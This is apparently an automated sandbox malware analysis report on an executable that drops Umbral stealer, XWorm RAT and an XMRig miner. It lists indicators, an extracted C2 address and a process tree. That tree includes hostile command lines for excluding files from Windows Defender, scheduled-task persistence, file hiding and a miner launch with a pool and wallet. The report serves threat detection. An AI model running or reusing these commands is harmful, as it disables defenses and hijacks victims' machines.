umbral | dcdfba770a5dd66fba128b96ada44e35ae13325e52d3909b03817e6636b4a57b

Analysis

max time kernel
22s
max time network
94s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
08-08-2024 11:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

CY2jVj7cNu8l.exe
Size

61.6MB
MD5

49e5af4b381070bfd8c6e5e17b06fe8d
SHA1

103a82cd6a8eda1334516b19ac704e026a35fc3d
SHA256

dcdfba770a5dd66fba128b96ada44e35ae13325e52d3909b03817e6636b4a57b
SHA512

50d176eafb0834f1185e211cfd0a2f72e9fef138dccb68eed06cd1c70cff73405e4cb8f1d976458143ab8b7f38157aac5e35b6576b2fdcd72e3190597a6cb7de
SSDEEP

1572864:B3mOA8SEJXql1coJh4V7LtXIgoku+arRazxMSNlcDplj:BWOA81tDoEV7Lx9oku3VfSEDpl

Score

10^/10

umbral xmrig xworm credential_access discovery evasion execution miner persistence privilege_escalation rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

Version

5.0

testarosa.duckdns.org:7110

Mutex

5ZpeoOe6AtQfr6wU

Attributes

Install_directory
%AppData%
install_file
Ondrive.exe

aes.plain

Signatures

Detect Umbral payload 20 IoCs

resource	yara_rule
behavioral1/files/0x000200000002aace-25.dat	family_umbral
behavioral1/files/0x000100000002aacf-90.dat	family_umbral
behavioral1/memory/3404-165-0x000002316A410000-0x000002316A450000-memory.dmp	family_umbral
behavioral1/memory/948-167-0x0000000000400000-0x00000000004F9000-memory.dmp	family_umbral
behavioral1/memory/4100-431-0x0000000000400000-0x00000000004F9000-memory.dmp	family_umbral
behavioral1/memory/2260-546-0x0000000000400000-0x00000000004F9000-memory.dmp	family_umbral
behavioral1/memory/484-566-0x0000000000400000-0x00000000004F9000-memory.dmp	family_umbral
behavioral1/memory/1068-631-0x0000000000400000-0x00000000004F9000-memory.dmp	family_umbral
behavioral1/memory/4292-667-0x0000000000400000-0x00000000004F9000-memory.dmp	family_umbral
behavioral1/memory/1984-684-0x0000000000400000-0x00000000004F9000-memory.dmp	family_umbral
behavioral1/memory/3176-706-0x0000000000400000-0x00000000004F9000-memory.dmp	family_umbral
behavioral1/memory/3876-751-0x0000000000400000-0x00000000004F9000-memory.dmp	family_umbral
behavioral1/memory/2976-775-0x0000000000400000-0x00000000004F9000-memory.dmp	family_umbral
behavioral1/memory/2260-799-0x0000000000400000-0x00000000004F9000-memory.dmp	family_umbral
behavioral1/memory/4064-825-0x0000000000400000-0x00000000004F9000-memory.dmp	family_umbral
behavioral1/memory/3768-845-0x0000000000400000-0x00000000004F9000-memory.dmp	family_umbral
behavioral1/memory/2840-889-0x0000000000400000-0x00000000004F9000-memory.dmp	family_umbral
behavioral1/memory/352-915-0x0000000000400000-0x00000000004F9000-memory.dmp	family_umbral
behavioral1/memory/2208-934-0x0000000000400000-0x00000000004F9000-memory.dmp	family_umbral
behavioral1/memory/3340-952-0x0000000000400000-0x00000000004F9000-memory.dmp	family_umbral

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000100000002aad6-239.dat	family_xworm
behavioral1/memory/3140-249-0x0000000000300000-0x0000000000310000-memory.dmp	family_xworm

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

XMRig Miner payload 7 IoCs

miner

resource	yara_rule
behavioral1/memory/844-640-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/844-642-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/844-648-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/844-647-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/844-646-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/844-645-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/844-644-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 28 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3568	powershell.exe
3860	powershell.exe
4000	powershell.exe
1980	powershell.exe
3040	powershell.exe
2968	powershell.exe
4412	powershell.exe
4700	powershell.exe
2976	powershell.exe
752	powershell.exe
4100	powershell.exe
4688	powershell.exe
848	powershell.exe
4252	powershell.exe
4628	powershell.exe
3108	powershell.exe
4500	powershell.exe
3412	powershell.exe
4528	powershell.exe
3504	powershell.exe
1080	powershell.exe
3004	powershell.exe
2492	powershell.exe
2840	powershell.exe
4780	powershell.exe
2360	powershell.exe
4780	powershell.exe
3304	powershell.exe

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	._cache_Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	._cache_Maple.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2680	netsh.exe

Executes dropped EXE 39 IoCs

pid	Process
3372	svhost.exe
2316	Server.exe
948	Maple.exe
1356	._cache_Server.exe
3404	._cache_Maple.exe
568	Synaptics.exe
3976	Server.exe
3140	conhost.exe
4420	._cache_Synaptics.exe
4036	Server.exe
3132	conhost.exe
1660	svhost.exe
1000	Server.exe
4100	Maple.exe
3580	._cache_Maple.exe
3176	._cache_Server.exe
4460	conhost.exe
4616	Server.exe
1360	svhost.exe
4620	Server.exe
2260	Maple.exe
4580	._cache_Server.exe
2700	Server.exe
1240	conhost.exe
1276	._cache_Maple.exe
1148	server.exe
224	svhost.exe
1448	Server.exe
484	Maple.exe
1132	._cache_Maple.exe
1644	svhost.exe
724	Server.exe
1068	Maple.exe
4808	._cache_Maple.exe
5076	Ondrive.exe
900	sihost64.exe
3604	svhost.exe
1340	Server.exe
4292	Maple.exe

Loads dropped DLL 14 IoCs

pid	Process
4100	Maple.exe
4100	Maple.exe
1000	Server.exe
1000	Server.exe
4620	Server.exe
4620	Server.exe
2260	Maple.exe
2260	Maple.exe
484	Maple.exe
484	Maple.exe
1068	Maple.exe
1068	Maple.exe
4292	Maple.exe
4292	Maple.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\????? = "C:\\ProgramData\\Synaptics\\Synaptics.exe"	Server.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs

Web Service

T1102

flow	ioc
23	discord.com
34	discord.com
47	discord.com
55	discord.com
1	discord.com
5	discord.com
10	discord.com
16	discord.com
28	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com
5	ip-api.com
10	ip-api.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3448 set thread context of 844	3448	conhost.exe	176

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 19 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Maple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Maple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Maple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Maple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Maple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Maple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 12 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3600	PING.EXE
1492	cmd.exe
3004	PING.EXE
2296	PING.EXE
2120	cmd.exe
276	cmd.exe
1608	PING.EXE
232	cmd.exe
2128	PING.EXE
4316	cmd.exe
1772	cmd.exe
4128	PING.EXE

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Detects videocard installed 1 TTPs 6 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1600	wmic.exe
4636	wmic.exe
3176	wmic.exe
4360	wmic.exe
916	wmic.exe
2448	wmic.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE

Kills process with taskkill 4 IoCs

evasion

pid	Process
1968	taskkill.exe
2020	taskkill.exe
3800	taskkill.exe
3632	taskkill.exe

Modifies registry class 10 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Synaptics.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Server.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Server.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Maple.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Server.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Maple.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Maple.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Maple.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Maple.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Maple.exe

Runs ping.exe 1 TTPs 6 IoCs

Remote System Discovery

T1018

pid	Process
2128	PING.EXE
3600	PING.EXE
3004	PING.EXE
4128	PING.EXE
2296	PING.EXE
1608	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4024	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
664	EXCEL.EXE
3140	conhost.exe

Suspicious behavior: EnumeratesProcesses 33 IoCs

pid	Process
3404	._cache_Maple.exe
3504	powershell.exe
3504	powershell.exe
4628	powershell.exe
4628	powershell.exe
3108	powershell.exe
3108	powershell.exe
2704	powershell.exe
2704	powershell.exe
1080	powershell.exe
1080	powershell.exe
3004	powershell.exe
3004	powershell.exe
2492	powershell.exe
2492	powershell.exe
4780	powershell.exe
4780	powershell.exe
4100	powershell.exe
4100	powershell.exe
1132	._cache_Maple.exe
2360	powershell.exe
2360	powershell.exe
3568	powershell.exe
3568	powershell.exe
4500	powershell.exe
4500	powershell.exe
1768	powershell.exe
1768	powershell.exe
3448	conhost.exe
3448	conhost.exe
4688	powershell.exe
4688	powershell.exe
4688	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3404	._cache_Maple.exe
Token: SeDebugPrivilege	3140	conhost.exe
Token: SeIncreaseQuotaPrivilege	4916	wmic.exe
Token: SeSecurityPrivilege	4916	wmic.exe
Token: SeTakeOwnershipPrivilege	4916	wmic.exe
Token: SeLoadDriverPrivilege	4916	wmic.exe
Token: SeSystemProfilePrivilege	4916	wmic.exe
Token: SeSystemtimePrivilege	4916	wmic.exe
Token: SeProfSingleProcessPrivilege	4916	wmic.exe
Token: SeIncBasePriorityPrivilege	4916	wmic.exe
Token: SeCreatePagefilePrivilege	4916	wmic.exe
Token: SeBackupPrivilege	4916	wmic.exe
Token: SeRestorePrivilege	4916	wmic.exe
Token: SeShutdownPrivilege	4916	wmic.exe
Token: SeDebugPrivilege	4916	wmic.exe
Token: SeSystemEnvironmentPrivilege	4916	wmic.exe
Token: SeRemoteShutdownPrivilege	4916	wmic.exe
Token: SeUndockPrivilege	4916	wmic.exe
Token: SeManageVolumePrivilege	4916	wmic.exe
Token: 33	4916	wmic.exe
Token: 34	4916	wmic.exe
Token: 35	4916	wmic.exe
Token: 36	4916	wmic.exe
Token: SeIncreaseQuotaPrivilege	4916	wmic.exe
Token: SeSecurityPrivilege	4916	wmic.exe
Token: SeTakeOwnershipPrivilege	4916	wmic.exe
Token: SeLoadDriverPrivilege	4916	wmic.exe
Token: SeSystemProfilePrivilege	4916	wmic.exe
Token: SeSystemtimePrivilege	4916	wmic.exe
Token: SeProfSingleProcessPrivilege	4916	wmic.exe
Token: SeIncBasePriorityPrivilege	4916	wmic.exe
Token: SeCreatePagefilePrivilege	4916	wmic.exe
Token: SeBackupPrivilege	4916	wmic.exe
Token: SeRestorePrivilege	4916	wmic.exe
Token: SeShutdownPrivilege	4916	wmic.exe
Token: SeDebugPrivilege	4916	wmic.exe
Token: SeSystemEnvironmentPrivilege	4916	wmic.exe
Token: SeRemoteShutdownPrivilege	4916	wmic.exe
Token: SeUndockPrivilege	4916	wmic.exe
Token: SeManageVolumePrivilege	4916	wmic.exe
Token: 33	4916	wmic.exe
Token: 34	4916	wmic.exe
Token: 35	4916	wmic.exe
Token: 36	4916	wmic.exe
Token: SeDebugPrivilege	3132	conhost.exe
Token: SeDebugPrivilege	3504	powershell.exe
Token: SeDebugPrivilege	4628	powershell.exe
Token: SeDebugPrivilege	3108	powershell.exe
Token: SeDebugPrivilege	4460	conhost.exe
Token: SeDebugPrivilege	2704	powershell.exe
Token: SeDebugPrivilege	1080	powershell.exe
Token: SeDebugPrivilege	3004	powershell.exe
Token: SeIncreaseQuotaPrivilege	4360	wmic.exe
Token: SeSecurityPrivilege	4360	wmic.exe
Token: SeTakeOwnershipPrivilege	4360	wmic.exe
Token: SeLoadDriverPrivilege	4360	wmic.exe
Token: SeSystemProfilePrivilege	4360	wmic.exe
Token: SeSystemtimePrivilege	4360	wmic.exe
Token: SeProfSingleProcessPrivilege	4360	wmic.exe
Token: SeIncBasePriorityPrivilege	4360	wmic.exe
Token: SeCreatePagefilePrivilege	4360	wmic.exe
Token: SeBackupPrivilege	4360	wmic.exe
Token: SeRestorePrivilege	4360	wmic.exe
Token: SeShutdownPrivilege	4360	wmic.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
664	EXCEL.EXE
664	EXCEL.EXE
664	EXCEL.EXE
664	EXCEL.EXE
664	EXCEL.EXE
664	EXCEL.EXE
664	EXCEL.EXE
664	EXCEL.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2144 wrote to memory of 3372	2144	CY2jVj7cNu8l.exe	78
PID 2144 wrote to memory of 3372	2144	CY2jVj7cNu8l.exe	78
PID 2144 wrote to memory of 2316	2144	CY2jVj7cNu8l.exe	79
PID 2144 wrote to memory of 2316	2144	CY2jVj7cNu8l.exe	79
PID 2144 wrote to memory of 2316	2144	CY2jVj7cNu8l.exe	79
PID 2144 wrote to memory of 948	2144	CY2jVj7cNu8l.exe	80
PID 2144 wrote to memory of 948	2144	CY2jVj7cNu8l.exe	80
PID 2144 wrote to memory of 948	2144	CY2jVj7cNu8l.exe	80
PID 2144 wrote to memory of 2264	2144	CY2jVj7cNu8l.exe	81
PID 2144 wrote to memory of 2264	2144	CY2jVj7cNu8l.exe	81
PID 2316 wrote to memory of 1356	2316	Server.exe	82
PID 2316 wrote to memory of 1356	2316	Server.exe	82
PID 948 wrote to memory of 3404	948	Maple.exe	83
PID 948 wrote to memory of 3404	948	Maple.exe	83
PID 2316 wrote to memory of 568	2316	Server.exe	84
PID 2316 wrote to memory of 568	2316	Server.exe	84
PID 2316 wrote to memory of 568	2316	Server.exe	84
PID 1356 wrote to memory of 3976	1356	._cache_Server.exe	85
PID 1356 wrote to memory of 3976	1356	._cache_Server.exe	85
PID 1356 wrote to memory of 3976	1356	._cache_Server.exe	85
PID 1356 wrote to memory of 3140	1356	._cache_Server.exe	86
PID 1356 wrote to memory of 3140	1356	._cache_Server.exe	86
PID 3404 wrote to memory of 4916	3404	._cache_Maple.exe	87
PID 3404 wrote to memory of 4916	3404	._cache_Maple.exe	87
PID 568 wrote to memory of 4420	568	Synaptics.exe	89
PID 568 wrote to memory of 4420	568	Synaptics.exe	89
PID 4420 wrote to memory of 4036	4420	._cache_Synaptics.exe	92
PID 4420 wrote to memory of 4036	4420	._cache_Synaptics.exe	92
PID 4420 wrote to memory of 4036	4420	._cache_Synaptics.exe	92
PID 4420 wrote to memory of 3132	4420	._cache_Synaptics.exe	93
PID 4420 wrote to memory of 3132	4420	._cache_Synaptics.exe	93
PID 3404 wrote to memory of 1680	3404	._cache_Maple.exe	94
PID 3404 wrote to memory of 1680	3404	._cache_Maple.exe	94
PID 3404 wrote to memory of 3504	3404	._cache_Maple.exe	96
PID 3404 wrote to memory of 3504	3404	._cache_Maple.exe	96
PID 3404 wrote to memory of 4628	3404	._cache_Maple.exe	98
PID 3404 wrote to memory of 4628	3404	._cache_Maple.exe	98
PID 3404 wrote to memory of 3108	3404	._cache_Maple.exe	100
PID 3404 wrote to memory of 3108	3404	._cache_Maple.exe	100
PID 2264 wrote to memory of 1660	2264	CY2jVj7cNu8l.exe	102
PID 2264 wrote to memory of 1660	2264	CY2jVj7cNu8l.exe	102
PID 2264 wrote to memory of 1000	2264	CY2jVj7cNu8l.exe	103
PID 2264 wrote to memory of 1000	2264	CY2jVj7cNu8l.exe	103
PID 2264 wrote to memory of 1000	2264	CY2jVj7cNu8l.exe	103
PID 2264 wrote to memory of 4100	2264	CY2jVj7cNu8l.exe	127
PID 2264 wrote to memory of 4100	2264	CY2jVj7cNu8l.exe	127
PID 2264 wrote to memory of 4100	2264	CY2jVj7cNu8l.exe	127
PID 2264 wrote to memory of 2292	2264	CY2jVj7cNu8l.exe	105
PID 2264 wrote to memory of 2292	2264	CY2jVj7cNu8l.exe	105
PID 4100 wrote to memory of 3580	4100	Maple.exe	106
PID 4100 wrote to memory of 3580	4100	Maple.exe	106
PID 1000 wrote to memory of 3176	1000	Server.exe	207
PID 1000 wrote to memory of 3176	1000	Server.exe	207
PID 3176 wrote to memory of 4616	3176	._cache_Server.exe	108
PID 3176 wrote to memory of 4616	3176	._cache_Server.exe	108
PID 3176 wrote to memory of 4616	3176	._cache_Server.exe	108
PID 3176 wrote to memory of 4460	3176	._cache_Server.exe	109
PID 3176 wrote to memory of 4460	3176	._cache_Server.exe	109
PID 3404 wrote to memory of 2704	3404	._cache_Maple.exe	110
PID 3404 wrote to memory of 2704	3404	._cache_Maple.exe	110
PID 3140 wrote to memory of 1080	3140	conhost.exe	112
PID 3140 wrote to memory of 1080	3140	conhost.exe	112
PID 3140 wrote to memory of 3004	3140	conhost.exe	237
PID 3140 wrote to memory of 3004	3140	conhost.exe	237

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 6 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4700	attrib.exe
2420	attrib.exe
3004	attrib.exe
1680	attrib.exe
720	attrib.exe
2896	attrib.exe

C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
"C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2144
- C:\Users\Admin\AppData\Local\Temp\svhost.exe
  "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
  2⤵
  - Executes dropped EXE
  PID:3372
- - C:\Windows\System32\conhost.exe
    "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    PID:3448
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
      4⤵
      Executes dropped EXE
      PID:900
    - - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost64"
        5⤵
        
        PID:4720
  - - C:\Windows\explorer.exe
      C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:8888 --user=46st6bNu7XPG5aK7HqhgaZgh1Hu2gRDuN28Bo1JjZPN7EU4G4Q77dapM43DnewbatVJ9PytqoaKGWR11YjRFQkYUJkpygyX --pass=x --cpu-max-threads-hint=20 --cinit-idle-wait=5 --cinit-idle-cpu=80
      4⤵
      PID:844
- C:\Users\Admin\AppData\Local\Temp\Server.exe
  "C:\Users\Admin\AppData\Local\Temp\Server.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2316
- - C:\Users\Admin\AppData\Local\Temp\._cache_Server.exe
    "C:\Users\Admin\AppData\Local\Temp\._cache_Server.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1356
  - - C:\Users\Admin\AppData\Roaming\Server.exe
      "C:\Users\Admin\AppData\Roaming\Server.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3976
    - - C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1148
  - - C:\Users\Admin\AppData\Roaming\conhost.exe
      "C:\Users\Admin\AppData\Roaming\conhost.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: AddClipboardFormatListener
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3140
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\conhost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1080
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'conhost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3004
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Ondrive.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2492
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Ondrive.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4780
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Ondrive" /tr "C:\Users\Admin\AppData\Roaming\Ondrive.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4024
- - C:\ProgramData\Synaptics\Synaptics.exe
    "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:568
  - - C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
      "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4420
    - - C:\Users\Admin\AppData\Roaming\Server.exe
        
        "C:\Users\Admin\AppData\Roaming\Server.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4036
    - - C:\Users\Admin\AppData\Roaming\conhost.exe
        
        "C:\Users\Admin\AppData\Roaming\conhost.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3132
- C:\Users\Admin\AppData\Local\Temp\Maple.exe
  "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:948
- - C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe
    "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3404
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4916
  - - C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
      4⤵
      Views/modifies file attributes
      PID:1680
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3504
